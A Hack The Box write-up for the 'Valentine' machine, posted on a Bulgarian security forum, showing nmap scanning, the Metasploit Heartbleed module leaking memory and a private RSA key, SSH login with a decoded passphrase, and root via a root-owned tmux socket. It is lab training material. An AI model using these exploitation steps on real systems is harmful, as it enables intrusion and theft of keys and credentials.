Преминете към съдържанието

МЕУ организира кампания за пентестове в държавната администрация

Целта на кампанията е да подобри киберсигурността в държавната администрация, като участието в нея е доброволно и не се обвързва с възнаграждение.
Прочети повече за програмата

Добре дошли в Хакинг.БГ! 

Всеки един от нас стои на раменете на гигантите, споделили знанията и опита си с нас.

Този форум е нашият начин да върнем жеста за бъдещите и текущите кадри в киберсигурността.

Стремим се да предоставим платформа, където членовете могат да развиват своите умения, като се дава приоритет на етиката, сигурността и поверителността!

  • HTB - WriteUps

Valentine


h3xu

255 views

# Enumeration

### NMAP

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesnt have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_ssl-date: 2021-05-13T09:00:42+00:00; +3m55s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 3m54s

### Web Application
#Dirbuster
![[Pasted image 20210513120755.png]]#/dev/notes

To do:

1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.

Both port 80 and 443 have the same functionality. The first thing we see is a woman and a bleeding heart. Weirdly enough there is an OpenSSL vulnerability called *[heartbleed](https://heartbleed.com)*.

# Exploit w/ Metasploit

I am running an auxiliary module to check if the vulnerability exists for this machine. Then I am going to exploit the vulnerability by dumping the information from the memory of the server.

msf6 auxiliary(scanner/ssl/openssl_heartbleed) > exploit

[+] 10.10.10.79:443       - Heartbeat response with leak, 65535 bytes
[*] 10.10.10.79:443       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
action => DUMP
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run

[+] 10.10.10.79:443       - Heartbeat response with leak, 65535 bytes
[+] 10.10.10.79:443       - Heartbeat data stored in /root/.msf4/loot/20210513073901_default_10.10.10.79_openssl.heartble_912349.bin
[*] 10.10.10.79:443       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I am going to use *strings* to check the contents of the binary file produced by heartbleed. The output reveals a base64 text string.

$ sudo strings /root/.msf4/loot/20210513073901_default_10.10.10.79_openssl.heartble_912349.bin                 1 ⨯
[sudo] password for kali: 
0&J/
u8DF
ux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Referer: https://127.0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
.Dl[
/m:t w
wHXpq
N[xckM
t]Sd
fwF)u`
1MC&
P0N0
["lr
["lr
'760{pu
.Dl[
/m:t w
wHXpq
N[xckM             

   

The decoded version of the text value is ***heartbleedbelievethehype*** and I guess it is a passphrase.

$ printf "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" |base64 -d                                                     1 ⨯
heartbleedbelievethehype

Next thing I wanna do is search for other actions that are available on this module.

msf6 auxiliary(scanner/ssl/openssl_heartbleed) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------
   DUMP  Dump memory contents to loot
   KEYS  Recover private keys from memory
   SCAN  Check hosts for vulnerability


msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set action KEYS
action => KEYS
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run

[*] 10.10.10.79:443       - Scanning for private keys
[*] 10.10.10.79:443       - Getting public key constants...
[*] 10.10.10.79:443       - 2021-05-13 11:42:28 UTC - Starting.
[*] 10.10.10.79:443       - 2021-05-13 11:42:28 UTC - Attempt 0...
[+] 10.10.10.79:443       - 2021-05-13 11:42:30 UTC - Got the private key
[*] 10.10.10.79:443       - -----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAwygXrPgZKkHSij/OeRwZ9PtI+tMvM2tvyJz5o78ZZqihjfki
Yg7hnkVQH1kvrLqVz68jqlTJZEAPJajF3cvEHIcM0nMSLnd2z4lI+zlK4fU9QMO1
moJo9o2Msk0/TwMJwLqtdF1TZLBXakQPH7f2+wWIrrLByt6m+8Vmd0YpdWDQr5Hd
WTA6C4+FIeVdyCIcVup6Lw0nXOKn1i5VRheHItUbZmIlhfoJHDhtGxSeqXrgMU1D
Js6wkebQm0jYz095+a8SRNRl5P93R1aFTTvprdtN6y0pl/hampnDrRcabHOkBB/l
1Y6ox6YgrorgULjxstJI3n2ziQ226G3Ho4JelwIDAQABAoIBAQCWkqd5wE6CSRjt
q/9deC4a04riY/CmJr2vtlXyXi52A6Pqi49YwwyW9fm0xjY/ehK+k+3brOFZ5QcK
0mYgE+iy7gwZj8k2atwTkmPp2bGKF5J0FsxWc0oS+PHWXD19c+Wheyb7gkomhNxd
VDerDGCWGxXzXF6jbRi/ZvYBDvRL59YOvXmdQa3MKykGywUn+NFZvUxICyEma24K
5ABMIWm5cTmDzm5Cd5/wn5Pu4tY0TIzfoa3KnA+M8vpmd4xgRGWGpatFKrM3LqSq
W0+Rr81Ty/R7lr1DkLDKp1ltvCl3pp1Lkoo3Ublk38C6gHHS3Vfs6h+QJfNgjeQu
RyKqm3H5AoGBAPFMTE9WpalFjB0u+hHNbFRfRet8480wa5702AEDK/cHi0U+R9Z0
Va/qm7PtzBP/m4nUXJwZbvG9O2PKXusGmgIBc/jqSQpQriIvBb27AJiq65Jd7tJ4
AiNZm6v/bFChFmWhdZe1S4vBgnlYoRWHsu+3JJpMJFKZYYl9O/X8ZWdtAoGBAM8M
F8KO2EtVQUrosnZQfn+2pLbY4n4Q66N3QaBeoqY7UipBJ1r3jIfupiw5+M1gEXvB
gnQmRLwRAA7Wmsh0/eCxeOk7kgNr7W8nNdxwp0Uv06h1CtEqvFIuXab5pYG5/QKs
habSXxY02QuaVgM/vXBTSOO0TC/7Rm6ORJzAxAeTAoGBAOakinBvnwuMmaAvjgJE
O57uLlQoXUp9VPFskaduE7EdOecm393B90GeW9QBoccf1NlK7naa7OwOd90ry8yU
09LE9shfkQ9WDQxJrBAt1iUXgvK17Jiq80g818rw6+SqBVGBongvZ5WfkwpQSDDf
M49knI0L6NA3If8cgJrg9UCFAoGBAK1DJmL23MP13UTNhAKEi8deVWp6BteOW1KZ
Cr8kUqIfRDv99+wk+mIKcN7TyIQ9H4RbxEpkd+KVq2G/bxnO5WFxwogTBLZ+S9xX
iLgnQaMhSdNP1rSBOcTf7hk8EqeDt9nT+6hFpbLUmMkf51iir2nfGEEM8TC56w+7
WGmA2sqnAoGAUyztn0Sc08xny1oGQXjVcVy/KsszYNfaF2y4i6tsbDsD2HfzRvbp
zeSeXxopyjjMTKCIMONh88JFeJoctmsLg2eG3uFw5c+wvD+GBafFfufvf2Xz183h
05q+RVlBncSiUayk33RtWi0Csl9L3prrGKh9RLUBmkSZ/E90ATxE92w=
-----END RSA PRIVATE KEY-----

[*] 10.10.10.79:443       - Private key stored in /root/.msf4/loot/20210513074230_default_10.10.10.79_openssl.heartble_001596.txt
[*] 10.10.10.79:443       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Now that I had a passphrase and a private key, I tried to login with usernames such as admin, bleed, heart, heartbleed, bleedheart, valentine and others. In the end I had to enumerate where I was mistaken and figured out that I had missed something. In the /dev/ directory there is a secondary file called *hype_key*  which not only contains a HEX value of a private key but it also tells me that the owner of the private key's name is ***hype***. I have inserted the hex value to a hex-to-text and received a second private key. Now all I have done is copied the private key to a file, changed its premissions to 600 and sshed to the box with the previously found passphrase.

# ssh -i web_key [email protected]
Enter passphrase for key 'web_key': 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$ 

There are many ways to achieve root on the machine. The output from the *linuxprivchecker.py* revealed SUID files of interest, processes such as tmux(owned by root) running a *dev_sess* socket and DirtyCow kernel exploit among others. I have chosen to go with the tmux one to save up some time.
 

hype@Valentine:~/Desktop$ ps aux
...snip...
root       1020  0.0  0.1  26416  1672 ?        Ss   01:59   0:05 /usr/bin/tmux -S /.devs/dev_sess
...snip...

hype@Valentine:~/Desktop$ tmux -S /.devs/dev_sess
root@Valentine:/home/hype/Desktop# whoami
root

 

0 Comments


Recommended Comments

Няма коментари

HACKING.BG Партньори

Asset3.png.df693f7661f6e8a7a3ec208659eda80b.pngtransparent1.png.c15979e1dc997cdd3a9941e342368a9b.png2.png.3e2592eadc660ecc831f1fdd569e8eb4.png600_489534840.png.72981fb02b90f1986dd7ade4d561e6d0.pngcyberclub-logo-text.png.6e9d11752e2eade43d40337d83365e48.png

×
×
  • Създай ново...

Важна информация!

Политика за сигурност и условия на ползване Privacy Policy